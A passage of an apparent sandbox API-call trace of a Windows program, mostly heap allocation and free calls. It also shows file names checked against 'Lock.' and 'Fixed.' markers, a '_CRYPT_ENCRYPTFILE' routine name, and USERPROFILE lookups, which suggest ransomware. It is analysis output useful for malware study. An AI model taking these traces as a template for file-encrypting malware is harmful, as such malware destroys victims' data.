lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0245.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0245.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0245.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0245.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n2lzfQolvCVgNf.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0245.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2lzfQolvCVgNf.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0245.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lzfQolvCVgNf.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0245.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zfQolvCVgNf.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0245.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fQolvCVgNf.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0245.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QolvCVgNf.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0245.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="olvCVgNf.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0245.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lvCVgNf.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0245.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vCVgNf.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0245.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CVgNf.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0245.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VgNf.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0245.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gNf.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0245.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nf.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0245.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0245.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0245.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0245.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0245.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0245.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0245.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0245.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0245.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0245.634] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0245.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0245.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0245.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0245.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0245.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0245.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0245.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0245.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0245.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0245.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0245.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0245.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0245.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0245.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0245.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0245.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0245.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0245.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0245.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x26) returned 0x977c68 [0245.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0245.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n2lzfQolvCVgNf.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0245.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2lzfQolvCVgNf.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0245.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lzfQolvCVgNf.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0245.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zfQolvCVgNf.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0245.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fQolvCVgNf.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0245.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QolvCVgNf.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0245.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="olvCVgNf.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0245.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lvCVgNf.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0245.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vCVgNf.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0245.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CVgNf.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0245.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VgNf.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0245.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gNf.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0245.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nf.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0245.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0245.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ab0 [0245.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0245.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ab0 | out: hHeap=0x970000) returned 1 [0245.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0245.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0245.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0245.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0245.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0245.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0245.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0245.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0245.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0245.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0245.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0245.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0245.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0245.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0245.636] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0245.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f48 [0245.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0245.636] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0245.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f48 | out: hHeap=0x970000) returned 1 [0245.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0245.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0245.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0245.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0245.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0245.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0245.636] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0245.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0245.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0245.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0245.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0245.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0245.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0245.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0245.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0245.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0245.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0245.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0245.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0245.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0245.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0245.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0245.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0245.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0245.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0245.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0245.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0245.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0245.671] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0245.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0245.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0245.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0245.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0245.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0245.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0245.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e58910 [0245.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0245.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0245.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0245.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0245.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0245.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0245.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0245.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0245.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0245.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0245.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0245.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0245.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0245.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0245.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0245.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0245.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0245.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0245.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ae8 [0245.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0245.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0245.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0245.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0245.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0245.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0245.673] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0245.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0245.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0245.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0245.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0245.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0245.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0245.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0245.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0245.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0245.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0245.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0245.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0245.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0245.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0245.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0245.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0245.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0245.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0245.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0245.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0245.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0245.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0245.674] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0245.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0245.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0245.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0245.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0245.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0245.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0245.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0245.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0245.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0245.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0245.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0245.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0245.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0245.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0245.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0245.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0245.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0245.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0245.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0245.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0245.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0245.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0245.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0245.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0245.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0245.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0245.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0245.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0245.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0245.675] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0245.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0245.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0245.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0245.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0245.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0245.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0245.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0245.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0245.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0245.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0245.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0245.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0245.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0245.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 